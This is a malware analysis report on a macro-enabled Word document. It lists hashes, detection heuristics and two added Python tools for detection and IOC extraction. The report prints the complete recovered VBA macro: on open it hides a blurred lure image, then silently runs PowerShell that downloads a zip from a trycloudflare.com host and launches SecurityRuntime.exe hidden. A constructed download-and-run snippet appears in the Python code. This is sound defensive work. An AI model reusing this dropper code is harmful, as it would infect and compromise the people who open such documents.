Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 1f5660cb801de5c7…

MALICIOUS

Office (OOXML) / .DOCX

Size: 2.16 MB
Created: 2026-06-01 10:28:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2026-06-10
MD5: 62759aff3b1680427b5566bab2a72b9d
SHA-1: 9a1134430d1b6aa6fc880a480de48778e29f7cc6
SHA-256: 1f5660cb801de5c7a777c25459f265855a0f90fa27de85eeaec87a673139b18d
Risk score: 250

Heuristics (7)

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project (word/vbaProject.bin); VBA macros are present. The Document_Open handler first swaps shapes tagged "blur_" for their "clear_" counterparts, the usual "enable content to see the document" lure, and then calls the downloader routine.
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell Command, vbHide
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Command = "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command " & _
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it, either by writing it to a script file and running that, or by launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick or cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper finding, stronger than the individual Shell / download keywords on their own. In this sample the download primitive is Invoke-WebRequest (wrapped in a five-attempt retry loop), the run primitive is Start-Process, and both sit inside the PowerShell one-liner assembled in ОбновитьАгентаВФоне, which Document_Open calls and which launches the command via Shell with vbHide.
    Matched line in script
    Private Sub Document_Open()
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. For this sample the source was recovered (macros.bas below), and the pairing is visible there: Document_Open together with Shell and the powershell command string.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://apps-partnership-types-bride.trycloudflare.com/SecurityRuntime-publish2.zip In document text (OOXML body / shared strings)
    The same URL is hard-coded as Url in the extracted macro. The host is a Cloudflare Quick Tunnel (trycloudflare.com), an ephemeral, randomly named hostname, so pivot on the path SecurityRuntime-publish2.zip, the drop directory C:\Users\Public\Documents\SecurityRuntime and the executable name SecurityRuntime.exe rather than on the host. The ngrok-skip-browser-warning request header the macro sends has no effect on Cloudflare and suggests the stage was previously served through an ngrok tunnel.
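The two pairing heuristics above (OLE_VBA_BITSTRANSFER_DROPPER and OLE_VBA_PCODE_AUTOEXEC_EXEC) are easy to reimplement, and doing so shows why de-escaping matters. The following is an added example written for this page, not the report's own detector: the token lists are the ones the descriptions quote, the two VBA snippets are constructed (the obfuscated one splits keywords with backticks, which a plain substring scan misses), and it only implements these two pairings, not the other findings.

```python
"""Added example (editor's code, not this report's own detector): a small
reimplementation of the two pairing heuristics described above, run over
constructed VBA text. Token lists are the ones the descriptions quote; the
sample macros below are constructed, not taken from this document."""
import re

AUTOEXEC = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
            "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")
DOWNLOAD_PRIMS = ("Start-BitsTransfer", "Invoke-WebRequest", "Net.WebClient",
                  "bitsadmin", "certutil")
RUN_PRIMS = ("Start-Process", "Invoke-Expression", "iex", "Shell", "wscript", "cscript")


def de_escape(src: str) -> str:
    """Undo the cheap splitting tricks: PowerShell backticks (In`voke-Web`Request),
    cmd carets (cert^util) and VBA ' _' line continuations. Backticks are stripped
    wholesale; that is wrong for a genuine `n/`t escape but harmless for a scanner."""
    src = re.sub(r"\s+_\r?\n\s*", " ", src)
    return src.replace("`", "").replace("^", "")


def find_tokens(text: str, tokens) -> list:
    """Case-insensitive whole-token match, so 'Shell' does not fire on 'powershell'."""
    return [t for t in tokens
            if re.search(r"(?<![\w-])" + re.escape(t) + r"(?![\w-])", text, re.I)]


def pcode_autoexec_exec(src: str) -> dict:
    """OLE_VBA_PCODE_AUTOEXEC_EXEC: fires only when an auto-exec entry point AND
    an execution token co-occur in the same stream."""
    auto, execs = find_tokens(src, AUTOEXEC), find_tokens(src, EXEC_TOKENS)
    return {"hit": bool(auto and execs), "autoexec": auto, "exec": execs}


def download_and_run(src: str) -> dict:
    """OLE_VBA_BITSTRANSFER_DROPPER: de-escape first, then require a download
    primitive, a run primitive and an auto-exec handler together."""
    clean = de_escape(src)
    dl, run, auto = (find_tokens(clean, DOWNLOAD_PRIMS),
                     find_tokens(clean, RUN_PRIMS), find_tokens(clean, AUTOEXEC))
    return {"hit": bool(dl and run and auto), "download": dl, "run": run, "autoexec": auto}


def scan(src: str) -> list:
    """Names of the pairing findings that fire, in the report's naming."""
    hits = []
    if download_and_run(src)["hit"]:
        hits.append("OLE_VBA_BITSTRANSFER_DROPPER")
    if pcode_autoexec_exec(src)["hit"]:
        hits.append("OLE_VBA_PCODE_AUTOEXEC_EXEC")
    return hits


# Constructed sample: backtick-split keywords that a plain substring scan misses.
SAMPLE_OBFUSCATED = '''Private Sub Document_Open()
    Dim c As String
    c = "powershell -w hidden -c ""Inv`oke-Web`Request -Uri 'http://example.invalid/p.zip' " & _
        "-OutFile $env:TEMP\\p.zip; Start-Pro`cess $env:TEMP\\p.zip"""
    Shell c, vbHide
End Sub
'''

# Constructed sample: an auto-exec handler that only toggles shapes (no execution token).
SAMPLE_BENIGN = '''Private Sub Document_Open()
    Application.ScreenUpdating = False
    ActiveDocument.Shapes(1).Visible = msoTrue
End Sub
'''

if __name__ == "__main__":
    print("raw substring scan:", find_tokens(SAMPLE_OBFUSCATED, DOWNLOAD_PRIMS))
    print("after de-escape:   ", scan(SAMPLE_OBFUSCATED))
    print("benign:            ", scan(SAMPLE_BENIGN))
```

The whole-token match is what keeps the pairing honest: a bare substring test for "Shell" would fire on every "powershell" string and turn the AND into a single-token rule.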

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3265 bytes
SHA-256: f6982c663fcfff4c575a211a4774b8df63d13615ac2417dfc1a96c641ca92087
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim doc As Document
    Set doc = ActiveDocument
    Dim shp As Shape
    
    ' Turn off screen updating so the swap happens instantly
    Application.ScreenUpdating = False
    
    ' Iterate over ALL floating objects in the document
    For Each shp In doc.Shapes
        
        ' If this is the blurred version, simply make it invisible
        If InStr(1, shp.AlternativeText, "blur_") > 0 Then
            shp.Visible = msoFalse
        End If
        
        ' If this is the clear version, make it visible
        If InStr(1, shp.AlternativeText, "clear_") > 0 Then
            shp.Visible = msoTrue
        End If
        
    Next shp
    
    Call ОбновитьАгентаВФоне   ' "UpdateAgentInBackground": the downloader routine below
    
    Application.ScreenUpdating = True
    MsgBox "Изображения успешно обновлены!", vbInformation, "Готово"   ' "Images updated successfully!", title "Done"
End Sub

Sub ОбновитьАгентаВФоне()   ' "UpdateAgentInBackground"
   
    Dim Url As String
    Dim TargetDir As String
    Dim ZipFile As String
    Dim ExtractDir As String
    Dim ExeName As String
    Dim Command As String
   
    ' ================== SETTINGS ==================
    Url = "https://apps-partnership-types-bride.trycloudflare.com/SecurityRuntime-publish2.zip"
    
    TargetDir = "C:\Users\Public\Documents"
    ZipFile = TargetDir & "\SecurityRuntime-publish2.zip"
    ExtractDir = TargetDir & "\SecurityRuntime"
    ExeName = "SecurityRuntime.exe"
    
    ' ===============================================
   
    ' PowerShell command
    Command = "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command " & _
        """$url = '" & Url & "'; " & _
        "$zip = '" & ZipFile & "'; " & _
        "$extract = '" & ExtractDir & "'; " & _
        "$exeName = '" & ExeName & "'; " & _
        "$headers = @{'ngrok-skip-browser-warning'='true'}; " & _
        "$maxRetries = 5; $retry = 0; $success = $false; " & _
        "do { try { Invoke-WebRequest -Uri $url -OutFile $zip -Headers $headers -UseBasicParsing -TimeoutSec 30; $success = $true } " & _
        "catch { Start-Sleep -Seconds 6; $retry++ } } while (!$success -and $retry -lt $maxRetries); " & _
        "if(Test-Path $zip) { " & _
            "Expand-Archive -Path $zip -DestinationPath $extract -Force; " & _
            "Remove-Item $zip -Force -ErrorAction SilentlyContinue; " & _
            "$exePath = Get-ChildItem -Path $extract -Recurse -Filter $exeName -File | Select-Object -First 1 -ExpandProperty FullName; " & _
            "if($exePath) { Start-Process $exePath -WindowStyle Hidden } " & _
        "} else { Write-Host 'Не удалось скачать' -ForegroundColor Red }"""   ' 'Download failed'
   
    Shell Command, vbHide
    

End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 12288 bytes
SHA-256: e94b17e50cb1ccd9cf39b5cd81d72995a2da9fb5bf13f7c3e0c7c56b28d7c255
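The OLE_VBA_SHELL and OLE_VBA_PS findings above only quote single matched lines; what an analyst actually wants from macros.bas is the fully assembled command line, with every `&`-concatenated piece and every substituted variable resolved, so the IOCs can be lifted from it. The block below is an added example written for this page, not tooling from the report. It feeds an abridged copy of the settings block and Command assignment from the macro above (retry loop and failure message dropped, the Sub renamed to the made-up `UpdateAgent`) through a small evaluator for VBA string expressions, then extracts URLs, hosts, Windows paths and the hidden/bypass launch flags from the reconstructed command.

```python
"""Added example (editor's code, not tooling from this report): statically
resolve the VBA string concatenation that builds the staged PowerShell command,
then pull IOCs out of the reconstructed command line. Handles ' _' line
continuations, VBA's "" quote escape and substitution of identifiers assigned
earlier (Url, TargetDir, ...)."""
import re
from urllib.parse import urlparse

# Abridged copy of the settings block and Command assignment from macros.bas above
# (retry loop and failure message dropped; the Sub name here is made up).
MACRO_SRC = r'''
Sub UpdateAgent()
    Url = "https://apps-partnership-types-bride.trycloudflare.com/SecurityRuntime-publish2.zip"
    TargetDir = "C:\Users\Public\Documents"
    ZipFile = TargetDir & "\SecurityRuntime-publish2.zip"
    ExtractDir = TargetDir & "\SecurityRuntime"
    ExeName = "SecurityRuntime.exe"
    Command = "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command " & _
        """$url = '" & Url & "'; $zip = '" & ZipFile & "'; " & _
        "$extract = '" & ExtractDir & "'; $exeName = '" & ExeName & "'; " & _
        "Invoke-WebRequest -Uri $url -OutFile $zip -UseBasicParsing -TimeoutSec 30; " & _
        "Expand-Archive -Path $zip -DestinationPath $extract -Force; " & _
        "$exePath = Get-ChildItem -Path $extract -Recurse -Filter $exeName -File | Select-Object -First 1 -ExpandProperty FullName; " & _
        "if($exePath) { Start-Process $exePath -WindowStyle Hidden }"""
    Shell Command, vbHide
End Sub
'''

# One VBA expression token: string literal ("" inside means a literal quote),
# identifier, the & operator, or whitespace.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)|(&)|(\s+)')
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)
URL_RE = re.compile(r"https?://[^\s'\";<>]+")
WINPATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\";]+")


def eval_concat(expr: str, env: dict):
    """Evaluate `"lit" & Name & "lit"`; None if the expression uses anything else
    (a function call, an unknown name) so a value is never guessed."""
    parts, pos = [], 0
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if m is None:
            return None
        pos = m.end()
        if m.group(1) is not None:
            parts.append(m.group(1).replace('""', '"'))
        elif m.group(2) is not None:
            if m.group(2) not in env:
                return None
            parts.append(env[m.group(2)])
    return "".join(parts)


def resolve_assignments(src: str) -> dict:
    """Walk `Name = expr` lines in source order, building up the string environment."""
    joined = re.sub(r"\s+_\r?\n\s*", " ", src)   # join ' _' continuation lines
    env = {}
    for name, expr in ASSIGN.findall(joined):
        value = eval_concat(expr, env)
        if value is not None:
            env[name] = value
    return env


def extract_iocs(env: dict, var: str = "Command") -> dict:
    """IOCs from the reconstructed command: URLs, hosts, Windows paths, and the
    hidden/bypass launch flags that a process-creation rule would key on."""
    cmd = env.get(var, "")
    urls = sorted(set(URL_RE.findall(cmd)))
    return {
        "command": cmd,
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "paths": sorted(set(WINPATH_RE.findall(cmd))),
        "hidden_bypass": "-WindowStyle Hidden" in cmd and "-ExecutionPolicy Bypass" in cmd,
    }


if __name__ == "__main__":
    for k, v in extract_iocs(resolve_assignments(MACRO_SRC)).items():
        print(f"{k}: {v}")
```

Because eval_concat refuses anything that is not a literal, a known identifier or `&`, a macro that builds the same command through Chr(), StrReverse() or Replace() calls yields no value rather than a wrong one; that is the point at which to fall back to dynamic extraction (olevba --deobf, or running the document in a sandbox).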